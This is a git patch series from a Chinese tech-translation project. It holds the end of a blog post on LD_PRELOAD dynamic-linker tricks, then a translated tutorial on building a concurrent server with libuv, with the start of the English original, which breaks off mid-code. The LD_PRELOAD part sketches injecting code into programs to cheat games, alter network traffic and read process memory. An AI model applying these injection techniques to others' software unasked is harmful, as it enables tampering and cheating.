I have in result? A shared library, which implements the open(…) function so that it behaves **exactly** as the real open(…)… except it has a side effect of  _printf_ ing the file path :-) + +If you are not convinced this is a powerful trick, it’s the time you tried the following: + +> ``` +> LD_PRELOAD=$PWD/inspect_open.so gnome-calculator +> ``` + +I encourage you to see the result yourself, but basically it lists every file this application accesses. In real time. + +I believe it’s not that hard to imagine why this might be useful for debugging or investigating unknown applications. Please note, however, that this particular trick is not quite complete, because  _open()_  is not the only function that opens files… For example, there is also  _open64()_  in the standard library, and for full investigation you would need to create a fake one too. + +#### **Possible uses** + +If you are still with me and enjoyed the above, let me suggest a bunch of ideas of what can be achieved using this trick. Keep in mind that you can do all the above without to source of the affected app! + +1. ~~Gain root privileges.~~ Not really, don’t even bother, you won’t bypass any security this way. (A quick explanation for pros: no libraries will be preloaded this way if ruid != euid) + +2. Cheat games: **Unrandomize.** This is what I did in the first example. For a fully working case you would need also to implement a custom  _random()_ ,  _rand_r()_ _, random_r()_ . Also some apps may be reading from  _/dev/urandom_  or so, you might redirect them to  _/dev/null_  by running the original  _open()_  with a modified file path. Furthermore, some apps may have their own random number generation algorithm, there is little you can do about that (unless: point 10 below). But this looks like an easy exercise for beginners. + +3. Cheat games: **Bullet time. **Implement all standard time-related functions pretend the time flows two times slower. Or ten times slower. If you correctly calculate new values for time measurement, timed  _sleep_ functions, and others, the affected application will believe the time runs slower (or faster, if you wish), and you can experience awesome bullet-time action. + Or go **even one step further** and let your shared library also be a DBus client, so that you can communicate with it real time. Bind some shortcuts to custom commands, and with some additional calculations in your fake timing functions you will be able to enable&disable the slow-mo or fast-forward anytime you wish. + +4. Investigate apps: **List accessed files.** That’s what my second example does, but this could be also pushed further, by recording and monitoring all app’s file I/O. + +5. Investigate apps: **Monitor internet access.** You might do this with Wireshark or similar software, but with this trick you could actually gain control of what an app sends over the web, and not just look, but also affect the exchanged data. Lots of possibilities here, from detecting spyware, to cheating in multiplayer games, or analyzing & reverse-engineering protocols of closed-source applications. + +6. Investigate apps: **Inspect GTK structures.** Why just limit ourselves to standard library? Let’s inject code in all GTK calls, so that we can learn what widgets does an app use, and how are they structured. This might be then rendered either to an image or even to a gtkbuilder file! Super useful if you want to learn how does some app manage its interface! + +7. **Sandbox unsafe applications.** If you don’t trust some app and are afraid that it may wish to _ rm -rf / _ or do some other unwanted file activities, you might potentially redirect all it’s file IO to e.g. /tmp by appropriately modifying the arguments it passes to all file-related functions (not just  _open_ , but also e.g. removing directories etc.). It’s more difficult trick that a chroot, but it gives you more control. It would be only as safe as complete your “wrapper” was, and unless you really know what you’re doing, don’t actually run any malicious software this way. + +8. **Implement features.** [zlibc][1] is an actual library which is run this precise way; it uncompresses files on the go as they are accessed, so that any application can work on compressed data without even realizing it. + +9. **Fix bugs. **Another real-life example: some time ago (I am not sure this is still the case) Skype – which is closed-source – had problems capturing video from some certain webcams. Because the source could not be modified as Skype is not free software, this was fixed by preloading a library that would correct these problems with video. + +10. Manually **access application’s own memory**. Do note that you can access all app data this way. This may be not impressive if you are familiar with software like CheatEngine/scanmem/GameConqueror, but they all require root privileges to work. LD_PRELOAD does not. In fact, with a number of clever tricks your injected code might access all app memory, because, in fact, it gets executed by that application itself. You might modify everything this application can. You can probably imagine this allows a lot of low-level hacks… but I’ll post an article about it another time. + +These are only the ideas I came up with. I bet you can find some too, if you do – share them by commenting! + +-------------------------------------------------------------------------------- + +via: https://rafalcieslak.wordpress.com/2013/04/02/dynamic-linker-tricks-using-ld_preload-to-cheat-inject-features-and-investigate-programs/ + +作者:[Rafał Cieślak ][a] +译者:[译者ID](https://github.com/译者ID) +校对:[校对者ID](https://github.com/校对者ID) + +本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 + +[a]:https://rafalcieslak.wordpress.com/ +[1]:http://www.zlibc.linux.lu/index.html From 46d6e7e4a63873835e64e5302d3c02f1618820e5 Mon Sep 17 00:00:00 2001 From: qhwdw Date: Mon, 4 Dec 2017 15:30:49 +0800 Subject: [PATCH 0230/1627] Translated by qhwdw --- ...1109 Concurrent Servers- Part 4 - libuv.md | 492 ++++++++++++++++++ 1 file changed, 492 insertions(+) create mode 100644 translated/tech/20171109 Concurrent Servers- Part 4 - libuv.md diff --git a/translated/tech/20171109 Concurrent Servers- Part 4 - libuv.md b/translated/tech/20171109 Concurrent Servers- Part 4 - libuv.md new file mode 100644 index 0000000000..b4db491e4e --- /dev/null +++ b/translated/tech/20171109 Concurrent Servers- Part 4 - libuv.md @@ -0,0 +1,492 @@ +[并发服务器:第四部分 - libuv][17] +============================================================ + +这是写并发网络服务器系列文章的第四部分。在这一部分中,我们将使用 libuv 去再次重写我们的服务器,并且也讨论关于使用一个线程池在回调中去处理耗时任务。最终,我们去看一下底层的 libuv,花一点时间去学习如何用异步 API 对文件系统阻塞操作进行封装。 + +这一系列的所有文章包括: + +* [第一部分 - 简介][7] + +* [第二部分 - 线程][8] + +* [第三部分 - 事件驱动][9] + +* [第四部分 - libuv][10] + +### 使用 Linux 抽象出事件驱动循环 + +在 [第三部分][11] 中,我们看到了基于 `select` 和 `epoll` 的相似之处,并且,我说过,在它们之间抽象出细微的差别是件很有魅力的事。Numerous 库已经做到了这些,但是,因为在这一部分中,我将去选一个并使用它。我选的这个库是 [libuv][12],它最初设计用于 Node.js 底层的轻便的平台层,并且,后来发现在其它的项目中已有使用。libuv 是用 C 写的,因此,它具有很高的可移植性,非常适用嵌入到像 JavaScript 和 Python 这样的高级语言中。 + +虽然 libuv 为抽象出底层平台细节已经有了一个非常大的框架,但它仍然是一个以 _事件循环_ 思想为中心的。在我们第三部分的事件驱动服务器中,事件循环在 main 函数中是很明确的;当使用 libuv 时,循环通常隐藏在库自身中,而用户代码仅需要注册事件句柄(作为一个回调函数)和运行这个循环。此外,libuv 将为给定的平台实现更快的事件循环实现。对于 Linux 它是 epoll,等等。 + +![libuv loop](https://eli.thegreenplace.net/images/2017/libuvloop.png) + +libuv 支持多路事件循环,并且,因此一个事件循环在库中是非常重要的;它有一个句柄 - `uv_loop_t`,和创建/杀死/启动/停止循环的函数。也就是说,在这篇文章中,我将仅需要使用 “默认的” 循环,libuv 可通过 `uv_default_loop()` 提供它;多路循环大多用于多线程事件驱动的服务器,这是一个更高级别的话题,我将留在这一系列文章的以后部分。 + +### 使用 libuv 的并发服务器 + +为了对 libuv 有一个更深的印象,让我们跳转到我们的可靠的协议服务器,它通过我们的这个系列已经有了一个强大的重新实现。这个服务器的结构与第三部分中的基于 select 和 epoll 的服务器有一些相似之处。因为,它也依赖回调。完整的 [示例代码在这里][13];我们开始设置这个服务器的套接字绑定到一个本地端口: + +``` +int portnum = 9090; +if (argc >= 2) { + portnum = atoi(argv[1]); +} +printf("Serving on port %d\n", portnum); + +int rc; +uv_tcp_t server_stream; +if ((rc = uv_tcp_init(uv_default_loop(), &server_stream)) < 0) { + die("uv_tcp_init failed: %s", uv_strerror(rc)); +} + +struct sockaddr_in server_address; +if ((rc = uv_ip4_addr("0.0.0.0", portnum, &server_address)) < 0) { + die("uv_ip4_addr failed: %s", uv_strerror(rc)); +} + +if ((rc = uv_tcp_bind(&server_stream, (const struct sockaddr*)&server_address, 0)) < 0) { + die("uv_tcp_bind failed: %s", uv_strerror(rc)); +} +``` + +除了它被封装进 libuv APIs 中之外,你看到的是一个相当标准的套接字。在它的返回中,我们取得一个可工作于任何 libuv 支持的平台上的轻便的接口。 + +这些代码也很认真负责地演示了错误处理;多数的 libuv 函数返回一个整数状态,返回一个负数意味着出现了一个错误。在我们的服务器中,我们把这些错误按致命的问题处理,但也可以设想为一个更优雅的恢复。 + +现在,那个套接字已经绑定,是时候去监听它了。这里我们运行一个回调注册: + +``` +// Listen on the socket for new peers to connect. When a new peer connects, +// the on_peer_connected callback will be invoked. +if ((rc = uv_listen((uv_stream_t*)&server_stream, N_BACKLOG, on_peer_connected)) < 0) { + die("uv_listen failed: %s", uv_strerror(rc)); +} +``` + +当新的对端连接到这个套接字,`uv_listen` 将被调用去注册一个事件循环回调。我们的回调在这里被称为 `on_peer_connected`,并且我们一会儿将去检测它。 + +最终,main 运行这个 libuv 循环,直到它被停止(`uv_run` 仅在循环被停止或者发生错误时返回) + +``` +// Run the libuv event loop. +uv_run(uv_default_loop(), UV_RUN_DEFAULT); + +// If uv_run returned, close the default loop before exiting. +return uv_loop_close(uv_default_loop()); +``` + +注意,那个仅是一个单一的通过 main 优先去运行的事件循环回调;我们不久将看到怎么去添加更多的另外的回调。在事件循环的整个运行时中,添加和删除回调并不是一个问题 - 事实上,大多数服务器就是这么写的。 + +这是一个 `on_peer_connected`,它处理到服务器的新的客户端连接: + +``` +void on_peer_connected(uv_stream_t* server_stream, int status) { + if (status < 0) { + fprintf(stderr, "Peer connection error: %s\n", uv_strerror(status)); + return; + } + + // client will represent this peer; it's allocated on the heap and only + // released when the client disconnects. The client holds a pointer to + // peer_state_t in its data field; this peer state tracks the protocol state + // with this client throughout interaction. + uv_tcp_t* client = (uv_tcp_t*)xmalloc(sizeof(*client)); + int rc; + if ((rc = uv_tcp_init(uv_default_loop(), client)) < 0) { + die("uv_tcp_init failed: %s", uv_strerror(rc)); + } + client->data = NULL; + + if (uv_accept(server_stream, (uv_stream_t*)client) == 0) { + struct sockaddr_storage peername; + int namelen = sizeof(peername); + if ((rc = uv_tcp_getpeername(client, (struct sockaddr*)&peername, + &namelen)) < 0) { + die("uv_tcp_getpeername failed: %s", uv_strerror(rc)); + } + report_peer_connected((const struct sockaddr_in*)&peername, namelen); + + // Initialize the peer state for a new client: we start by sending the peer + // the initial '*' ack. + peer_state_t* peerstate = (peer_state_t*)xmalloc(sizeof(*peerstate)); + peerstate->state = INITIAL_ACK; + peerstate->sendbuf[0] = '*'; + peerstate->sendbuf_end = 1; + peerstate->client = client; + client->data = peerstate; + + // Enqueue the write request to send the ack; when it's done, + // on_wrote_init_ack will be called. The peer state is passed to the write + // request via the data pointer; the write request does not own this peer + // state - it's owned by the client handle. + uv_buf_t writebuf = uv_buf_init(peerstate->sendbuf, peerstate->sendbuf_end); + uv_write_t* req = (uv_write_t*)xmalloc(sizeof(*req)); + req->data = peerstate; + if ((rc = uv_write(req, (uv_stream_t*)client, &writebuf, 1, + on_wrote_init_ack)) < 0) { + die("uv_write failed: %s", uv_strerror(rc)); + } + } else { + uv_close((uv_handle_t*)client, on_client_closed); + } +} +``` + +这些代码都有很好的注释,但是,这里有一些重要的 libuv 语法我想去强调一下: + +* 进入回调中的自定义数据:因为 C 还没有停用,这可能是个挑战,libuv 在它的处理类型中有一个 `void*` 数据域;这些域可以被用于进入到用户数据。例如,注意 `client->data` 是如何指向到一个 `peer_state_t` 结构上,以便于通过 `uv_write` 和 `uv_read_start` 注册的回调可以知道它们正在处理的是哪个客户端的数据。 + +* 内存管理:事件驱动编程在语言中使用垃圾回收是非常容易的,因为,回调通常运行在一个它们注册的完全不同的栈框架中,使得基于栈的内存管理很困难。它总是需要传递堆分配的数据到 libuv 回调中(当所有回调运行时,除了 main,其它的都运行在栈上),并且,为了避免泄漏,许多情况下都要求这些数据去安全释放。这些都是些需要实践的内容 [[1]][6]。 + +这个服务器上对端的状态如下: + +``` +typedef struct { + ProcessingState state; + char sendbuf[SENDBUF_SIZE]; + int sendbuf_end; + uv_tcp_t* client; +} peer_state_t; +``` + +它与第三部分中的状态非常类似;我们不再需要 sendptr,因为,在调用 "done writing" 回调之前,`uv_write` 将确保去发送它提供的整个缓冲。我们也为其它的回调使用保持了一个到客户端的指针。这里是 `on_wrote_init_ack`: + +``` +void on_wrote_init_ack(uv_write_t* req, int status) { + if (status) { + die("Write error: %s\n", uv_strerror(status)); + } + peer_state_t* peerstate = (peer_state_t*)req->data; + // Flip the peer state to WAIT_FOR_MSG, and start listening for incoming data + // from this peer. + peerstate->state = WAIT_FOR_MSG; + peerstate->sendbuf_end = 0; + + int rc; + if ((rc = uv_read_start((uv_stream_t*)peerstate->client, on_alloc_buffer, + on_peer_read)) < 0) { + die("uv_read_start failed: %s", uv_strerror(rc)); + } + + // Note: the write request doesn't own the peer state, hence we only free the + // request itself, not the state. + free(req); +} +``` + +然后,我们确信知道了这个初始的 '*' 已经被发送到对端,我们通过调用 `uv_read_start` 去监听从这个对端来的入站数据,它注册一个回调(`on_peer_read`)去被调用,不论什么时候,事件循环都在套接字上接收来自客户端的调用: + +``` +void on_peer_read(uv_stream_t* client, ssize_t nread, const uv_buf_t* buf) { + if (nread < 0) { + if (nread != uv_eof) { + fprintf(stderr, "read error: %s\n", uv_strerror(nread)); + } + uv_close((uv_handle_t*)client, on_client_closed); + } else if (nread == 0) { + // from the documentation of uv_read_cb: nread might be 0, which does not + // indicate an error or eof. this is equivalent to eagain or ewouldblock + // under read(2). + } else { + // nread > 0 + assert(buf->len >= nread); + + peer_state_t* peerstate = (peer_state_t*)client->data; + if (peerstate->state == initial_ack) { + // if the initial ack hasn't been sent for some reason, ignore whatever + // the client sends in. + free(buf->base); + return; + } + + // run the protocol state machine. + for (int i = 0; i < nread; ++i) { + switch (peerstate->state) { + case initial_ack: + assert(0 && "can't reach here"); + break; + case wait_for_msg: + if (buf->base[i] == '^') { + peerstate->state = in_msg; + } + break; + case in_msg: + if (buf->base[i] == '$') { + peerstate->state = wait_for_msg; + } else { + assert(peerstate->sendbuf_end < sendbuf_size); + peerstate->sendbuf[peerstate->sendbuf_end++] = buf->base[i] + 1; + } + break; + } + } + + if (peerstate->sendbuf_end > 0) { + // we have data to send. the write buffer will point to the buffer stored + // in the peer state for this client. + uv_buf_t writebuf = + uv_buf_init(peerstate->sendbuf, peerstate->sendbuf_end); + uv_write_t* writereq = (uv_write_t*)xmalloc(sizeof(*writereq)); + writereq->data = peerstate; + int rc; + if ((rc = uv_write(writereq, (uv_stream_t*)client, &writebuf, 1, + on_wrote_buf)) < 0) { + die("uv_write failed: %s", uv_strerror(rc)); + } + } + } + free(buf->base); +} +``` + +这个服务器的运行时行为非常类似于第三部分的事件驱动服务器:所有的客户端都在一个单个的线程中并发处理。并且一些行为被维护在服务器代码中:服务器的逻辑实现为一个集成的回调,并且长周期运行是禁止的,因为它会阻塞事件循环。这一点也很类似。让我们进一步探索这个问题。 + +### 在事件驱动循环中的长周期运行的操作 + +单线程的事件驱动代码使它先天地对一些常见问题非常敏感:整个循环中的长周期运行的代码块。参见如下的程序: + +``` +void on_timer(uv_timer_t* timer) { + uint64_t timestamp = uv_hrtime(); + printf("on_timer [%" PRIu64 " ms]\n", (timestamp / 1000000) % 100000); + + // "Work" + if (random() % 5 == 0) { + printf("Sleeping...\n"); + sleep(3); + } +} + +int main(int argc, const char** argv) { + uv_timer_t timer; + uv_timer_init(uv_default_loop(), &timer); + uv_timer_start(&timer, on_timer, 0, 1000); + return uv_run(uv_default_loop(), UV_RUN_DEFAULT); +} +``` + +它用一个单个注册的回调运行一个 libuv 事件循环:`on_timer`,它被每秒钟循环调用一次。回调报告一个时间戳,并且,偶尔通过睡眠 3 秒去模拟一个长周期运行。这是运行示例: + +``` +$ ./uv-timer-sleep-demo +on_timer [4840 ms] +on_timer [5842 ms] +on_timer [6843 ms] +on_timer [7844 ms] +Sleeping... +on_timer [11845 ms] +on_timer [12846 ms] +Sleeping... +on_timer [16847 ms] +on_timer [17849 ms] +on_timer [18850 ms] +... +``` + +`on_timer` 忠实地每秒执行一次,直到随机出现的睡眠为止。在那个时间点,`on_timer` 不再被调用,直到睡眠时间结束;事实上,_没有其它的回调_  在这个时间帧中被调用。这个睡眠调用阻塞当前线程,它正是被调用的线程,并且也是事件循环使用的线程。当这个线程被阻塞后,事件循环也被阻塞。 + +这个示例演示了在事件驱动的调用中为什么回调不能被阻塞是多少的重要。并且,同样适用于 Node.js 服务器、客户端侧的 Javascript、大多数的 GUI 编程框架、以及许多其它的异步编程模型。 + +但是,有时候运行耗时的任务是不可避免的。并不是所有任务都有一个异步 APIs;例如,我们可能使用一些仅有同步 API 的库去处理,或者,正在执行一个可能的长周期计算。我们如何用事件驱动编程去结合这些代码?线程可以帮到你! + +### “转换” 阻塞调用到异步调用的线程 + +一个线程池可以被用于去转换阻塞调用到异步调用,通过与事件循环并行运行,并且当任务完成时去由它去公布事件。一个给定的阻塞函数 `do_work()`,这里介绍了它是怎么运行的: + +1. 在一个回调中,用 `do_work()` 代表直接调用,我们将它打包进一个 “任务”,并且请求线程池去运行这个任务。当任务完成时,我们也为循环去调用它注册一个回调;我们称它为 `on_work_done()`。 + +2. 在这个时间点,我们的回调可以返回并且事件循环保持运行;在同一时间点,线程池中的一个线程运行这个任务。 + +3. 一旦任务运行完成,通知主线程(指正在运行事件循环的线程),并且,通过事件循环调用 `on_work_done()`。 + +让我们看一下,使用 libuv 的工作调度 API,是怎么去解决我们前面的 timer/sleep 示例中展示的问题的: + +``` +void on_after_work(uv_work_t* req, int status) { + free(req); +} + +void on_work(uv_work_t* req) { + // "Work" + if (random() % 5 == 0) { + printf("Sleeping...\n"); + sleep(3); + } +} + +void on_timer(uv_timer_t* timer) { + uint64_t timestamp = uv_hrtime(); + printf("on_timer [%" PRIu64 " ms]\n", (timestamp / 1000000) % 100000); + + uv_work_t* work_req = (uv_work_t*)malloc(sizeof(*work_req)); + uv_queue_work(uv_default_loop(), work_req, on_work, on_after_work); +} + +int main(int argc, const char** argv) { + uv_timer_t timer; + uv_timer_init(uv_default_loop(), &timer); + uv_timer_start(&timer, on_timer, 0, 1000); + return uv_run(uv_default_loop(), UV_RUN_DEFAULT); +} +``` + +通过一个 work_req [[2]][14] 类型的句柄,我们进入一个任务队列,代替在 `on_timer` 上直接调用 sleep,这个函数在任务中(`on_work`)运行,并且,一旦任务完成(`on_after_work`),这个函数被调用一次。`on_work` 在这里是指发生的 “work”(阻塞中的/耗时的操作)。在这两个回调传递到 `uv_queue_work` 时,注意一个关键的区别:`on_work` 运行在线程池中,而 `on_after_work` 运行在事件循环中的主线程上 - 就好像是其它的回调一样。 + +让我们看一下这种方式的运行: + +``` +$ ./uv-timer-work-demo +on_timer [89571 ms] +on_timer [90572 ms] +on_timer [91573 ms] +on_timer [92575 ms] +Sleeping... +on_timer [93576 ms] +on_timer [94577 ms] +Sleeping... +on_timer [95577 ms] +on_timer [96578 ms] +on_timer [97578 ms] +... +``` + +即便在 sleep 函数被调用时,定时器也每秒钟滴答一下,睡眠(sleeping)现在运行在一个单独的线程中,并且不会阻塞事件循环。 + +### 一个用于练习的素数测试服务器 + +因为通过睡眼去模拟工作并不是件让人兴奋的事,我有一个事先准备好的更综合的一个示例 - 一个基于套接字接受来自客户端的数字的服务器,检查这个数字是否是素数,然后去返回一个 “prime" 或者 “composite”。完整的 [服务器代码在这里][15] - 我不在这里粘贴了,因为它太长了,更希望读者在一些自己的练习中去体会它。 + +这个服务器使用了一个原生的素数测试算法,因此,对于大的素数可能花很长时间才返回一个回答。在我的机器中,对于 2305843009213693951,它花了 ~5 秒钟去计算,但是,你的方法可能不同。 + +练习 1:服务器有一个设置(通过一个名为 MODE 的环境变量)要么去在套接字回调(意味着在主线程上)中运行素数测试,要么在 libuv 工作队列中。当多个客户端同时连接时,使用这个设置来观察服务器的行为。当它计算一个大的任务时,在阻塞模式中,服务器将不回复其它客户端,而在非阻塞模式中,它会回复。 + +练习 2;libuv 有一个缺省大小的线程池,并且线程池的大小可以通过环境变量配置。你可以通过使用多个客户端去实验找出它的缺省值是多少?找到线程池缺省值后,使用不同的设置去看一下,在重负载下怎么去影响服务器的响应能力。 + +### 在非阻塞文件系统中使用工作队列 + +对于仅傻傻的演示和 CPU 密集型的计算来说,将可能的阻塞操作委托给一个线程池并不是明智的;libuv 在它的文件系统 APIs 中本身就大量使用了这种性能。通过这种方式,libuv 使用一个异步 API,在一个轻便的方式中,显示出它强大的文件系统的处理能力。 + +让我们使用 `uv_fs_read()`,例如,这个函数从一个文件中(以一个 `uv_fs_t` 句柄为代表)读取一个文件到一个缓冲中 [[3]][16],并且当读取完成后调用一个回调。换句话说,`uv_fs_read()` 总是立即返回,甚至如果文件在一个类似 NFS 的系统上,并且,数据到达缓冲区可能需要一些时间。换句话说,这个 API 与这种方式中其它的 libuv APIs 是异步的。这是怎么工作的呢? + +在这一点上,我们看一下 libuv 的底层;内部实际上非常简单,并且它是一个很好的练习。作为一个便携的库,libuv 对于 Windows 和 Unix 系统在它的许多函数上有不同的实现。我们去看一下在 libuv 源树中的 src/unix/fs.c。 + +这是 `uv_fs_read` 的代码: + +``` +int uv_fs_read(uv_loop_t* loop, uv_fs_t* req, + uv_file file, + const uv_buf_t bufs[], + unsigned int nbufs, + int64_t off, + uv_fs_cb cb) { + if (bufs == NULL || nbufs == 0) + return -EINVAL; + + INIT(READ); + req->file = file; + + req->nbufs = nbufs; + req->bufs = req->bufsml; + if (nbufs > ARRAY_SIZE(req->bufsml)) + req->bufs = uv__malloc(nbufs * sizeof(*bufs)); + + if (req->bufs == NULL) { + if (cb != NULL) + uv__req_unregister(loop, req); + return -ENOMEM; + } + + memcpy(req->bufs, bufs, nbufs * sizeof(*bufs)); + + req->off = off; + POST; +} +``` + +第一次看可能觉得很困难,因为它延缓真实的工作到 INIT 和 POST 宏中,在 POST 中与一些本地变量一起设置。这样做可以避免了文件中的许多重复代码。 + +这是 INIT 宏: + +``` +#define INIT(subtype) \ + do { \ + req->type = UV_FS; \ + if (cb != NULL) \ + uv__req_init(loop, req, UV_FS); \ + req->fs_type = UV_FS_ ## subtype; \ + req->result = 0; \ + req->ptr = NULL; \ + req->loop = loop; \ + req->path = NULL; \ + req->new_path = NULL; \ + req->cb = cb; \ + } \ + while (0) +``` + +它设置了请求,并且更重要的是,设置 `req->fs_type` 域为真实的 FS 请求类型。因为 `uv_fs_read` 调用 invokes INIT(READ),它意味着 `req->fs_type` 被分配一个常数 `UV_FS_READ`。 + +这是 POST 宏: + +``` +#define POST \ + do { \ + if (cb != NULL) { \ + uv__work_submit(loop, &req->work_req, uv__fs_work, uv__fs_done); \ + return 0; \ + } \ + else { \ + uv__fs_work(&req->work_req); \ + return req->result; \ + } \ + } \ + while (0) +``` + +它做什么取决于回调是否为 NULL。在 libuv 文件系统 APIs 中,一个 NULL 回调意味着我们真实地希望去执行一个 _同步_ 操作。在这种情况下,POST 直接调用 `uv__fs_work`(我们需要了解一下这个函数的功能),而对于一个 non-NULL 回调,它提交 `uv__fs_work` 作为一个工作事项到工作队列(指的是线程池),然后,注册 `uv__fs_done` 作为回调;该函数执行一些登记并调用用户提供的回调。 + +如果我们去看 `uv__fs_work` 的代码,我们将看到它使用很多宏去按需路由工作到真实的文件系统调用。在我们的案例中,对于 `UV_FS_READ` 这个调用将被 `uv__fs_read` 生成,它(最终)使用普通的 POSIX APIs 去读取。这个函数可以在一个 _阻塞_ 方式中很安全地实现。因为,它通过异步 API 调用时被置于一个线程池中。 + +在 Node.js 中,fs.readFile 函数是映射到 `uv_fs_read` 上。因此,可以在一个非阻塞模式中读取文件,甚至是当底层文件系统 API 是阻塞方式时。 + +* * * + + +[[1]][1] 为确保服务器不泄露内存,我在一个启用泄露检查的 Valgrind 中运行它。因为服务器经常是被设计为永久运行,这是一个挑战;为克服这个问题,我在服务器上添加了一个 “kill 开关” - 一个从客户端接收的特定序列,以使它可以停止事件循环并退出。这个代码在 `theon_wrote_buf` 句柄中。 + + +[[2]][2] 在这里我们不过多地使用 `work_req`;讨论的素数测试服务器接下来将展示怎么被用于去传递上下文信息到回调中。 + + +[[3]][3] `uv_fs_read()` 提供了一个类似于 preadv Linux 系统调用的通用 API:它使用多缓冲区用于排序,并且支持一个到文件中的偏移。基于我们讨论的目的可以忽略这些特性。 + + +-------------------------------------------------------------------------------- + +via: https://eli.thegreenplace.net/2017/concurrent-servers-part-4-libuv/ + +作者:[Eli Bendersky ][a] +译者:[qhwdw](https://github.com/qhwdw) +校对:[校对者ID](https://github.com/校对者ID) + +本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 + +[a]:https://eli.thegreenplace.net/ +[1]:https://eli.thegreenplace.net/2017/concurrent-servers-part-4-libuv/#id1 +[2]:https://eli.thegreenplace.net/2017/concurrent-servers-part-4-libuv/#id2 +[3]:https://eli.thegreenplace.net/2017/concurrent-servers-part-4-libuv/#id3 +[4]:https://eli.thegreenplace.net/tag/concurrency +[5]:https://eli.thegreenplace.net/tag/c-c +[6]:https://eli.thegreenplace.net/2017/concurrent-servers-part-4-libuv/#id4 +[7]:http://eli.thegreenplace.net/2017/concurrent-servers-part-1-introduction/ +[8]:http://eli.thegreenplace.net/2017/concurrent-servers-part-2-threads/ +[9]:http://eli.thegreenplace.net/2017/concurrent-servers-part-3-event-driven/ +[10]:http://eli.thegreenplace.net/2017/concurrent-servers-part-4-libuv/ +[11]:http://eli.thegreenplace.net/2017/concurrent-servers-part-3-event-driven/ +[12]:http://libuv.org/ +[13]:https://github.com/eliben/code-for-blog/blob/master/2017/async-socket-server/uv-server.c +[14]:https://eli.thegreenplace.net/2017/concurrent-servers-part-4-libuv/#id5 +[15]:https://github.com/eliben/code-for-blog/blob/master/2017/async-socket-server/uv-isprime-server.c +[16]:https://eli.thegreenplace.net/2017/concurrent-servers-part-4-libuv/#id6 +[17]:https://eli.thegreenplace.net/2017/concurrent-servers-part-4-libuv/ From fb45dbb3d739a5ad577f34bfb7b74af9c5d96686 Mon Sep 17 00:00:00 2001 From: qhwdw Date: Mon, 4 Dec 2017 15:38:10 +0800 Subject: [PATCH 0231/1627] Translated by qhwdw --- ...1109 Concurrent Servers- Part 4 - libuv.md | 492 ------------------ ...1109 Concurrent Servers- Part 4 - libuv.md | 1 + 2 files changed, 1 insertion(+), 492 deletions(-) delete mode 100644 sources/tech/20171109 Concurrent Servers- Part 4 - libuv.md diff --git a/sources/tech/20171109 Concurrent Servers- Part 4 - libuv.md b/sources/tech/20171109 Concurrent Servers- Part 4 - libuv.md deleted file mode 100644 index 94b98cf5c2..0000000000 --- a/sources/tech/20171109 Concurrent Servers- Part 4 - libuv.md +++ /dev/null @@ -1,492 +0,0 @@ -Translating by qhwdw [Concurrent Servers: Part 4 - libuv][17] -============================================================ - -This is part 4 of a series of posts on writing concurrent network servers. In this part we're going to use libuv to rewrite our server once again, and also talk about handling time-consuming tasks in callbacks using a thread pool. Finally, we're going to look under the hood of libuv for a bit to study how it wraps blocking file-system operations with an asynchronous API. - -All posts in the series: - -* [Part 1 - Introduction][7] - -* [Part 2 - Threads][8] - -* [Part 3 - Event-driven][9] - -* [Part 4 - libuv][10] - -### Abstracting away event-driven loops with libuv - -In [part 3][11], we've seen how similar select-based and epoll-based servers are, and I mentioned it's very tempting to abstract away the minor differences between them. Numerous libraries are already doing this, however, so in this part I'm going to pick one and use it. The library I'm picking is [libuv][12], which was originally designed to serve as the underlying portable platform layer for Node.js, and has since found use in additional projects. libuv is written in C, which makes it highly portable and very suitable for tying into high-level languages like JavaScript and Python. - -While libuv has grown to be a fairly large framework for abstracting low-level platform details, it remains centered on the concept of an  _event loop_ . In our event-driven servers in part 3, the event loop was explicit in the main function; when using libuv, the loop is usually hidden inside the library itself, and user code just registers event handlers (as callback functions) and runs the loop. Furthermore, libuv will use the fastest event loop implementation for a given platform: for Linux this is epoll, etc. - -![libuv loop](https://eli.thegreenplace.net/images/2017/libuvloop.png) - -libuv supports multiple event loops, and thus an event loop is a first class citizen within the library; it has a handle - uv_loop_t, and functions for creating/destroying/starting/stopping loops. That said, I will only use the "default" loop in this post, which libuv makes available via uv_default_loop(); multiple loops are mosly useful for multi-threaded event-driven servers, a more advanced topic I'll leave for future parts in the series. - -### A concurrent server using libuv - -To get a better feel for libuv, let's jump to our trusty protocol server that we've been vigorously reimplementing throughout the series. The structure of this server is going to be somewhat similar to the select and epoll-based servers of part 3, since it also relies on callbacks. The full [code sample is here][13]; we start with setting up the server socket bound to a local port: - -``` -int portnum = 9090; -if (argc >= 2) { - portnum = atoi(argv[1]); -} -printf("Serving on port %d\n", portnum); - -int rc; -uv_tcp_t server_stream; -if ((rc = uv_tcp_init(uv_default_loop(), &server_stream)) < 0) { - die("uv_tcp_init failed: %s", uv_strerror(rc)); -} - -struct sockaddr_in server_address; -if ((rc = uv_ip4_addr("0.0.0.0", portnum, &server_address)) < 0) { - die("uv_ip4_addr failed: %s", uv_strerror(rc)); -} - -if ((rc = uv_tcp_bind(&server_stream, (const struct sockaddr*)&server_address, 0)) < 0) { - die("uv_tcp_bind failed: %s", uv_strerror(rc)); -} -``` - -Fairly standard socket fare here, except that it's all wrapped in libuv APIs. In return we get a portable interface that should work on any platform libuv supports. - -This code also demonstrates conscientious error handling; most libuv functions return an integer status, with a negative number meaning an error. In our server we treat these errors as fatals, but one may imagine a more graceful recovery. - -Now that the socket is bound, it's time to listen on it. Here we run into our first callback registration: - -``` -// Listen on the socket for new peers to connect. When a new peer connects, -// the on_peer_connected callback will be invoked. -if ((rc = uv_listen((uv_stream_t*)&server_stream, N_BACKLOG, on_peer_connected)) < 0) { - die("uv_listen failed: %s", uv_strerror(rc)); -} -``` - -uv_listen registers a callback that the event loop will invoke when new peers connect to the socket. Our callback here is called on_peer_connected, and we'll examine it soon. - -Finally, main runs the libuv loop until it's stopped (uv_run only returns when the loop has stopped or some error occurred). - -``` -// Run the libuv event loop. -uv_run(uv_default_loop(), UV_RUN_DEFAULT); - -// If uv_run returned, close the default loop before exiting. -return uv_loop_close(uv_default_loop()); -``` - -Note that only a single callback was registered by main prior to running the event loop; we'll soon see how additional callbacks are added. It's not a problem to add and remove callbacks throughout the runtime of the event loop - in fact, this is how most servers are expected to be written. - -This is on_peer_connected, which handles new client connections to the server: - -``` -void on_peer_connected(uv_stream_t* server_stream, int status) { - if (status < 0) { - fprintf(stderr, "Peer connection error: %s\n", 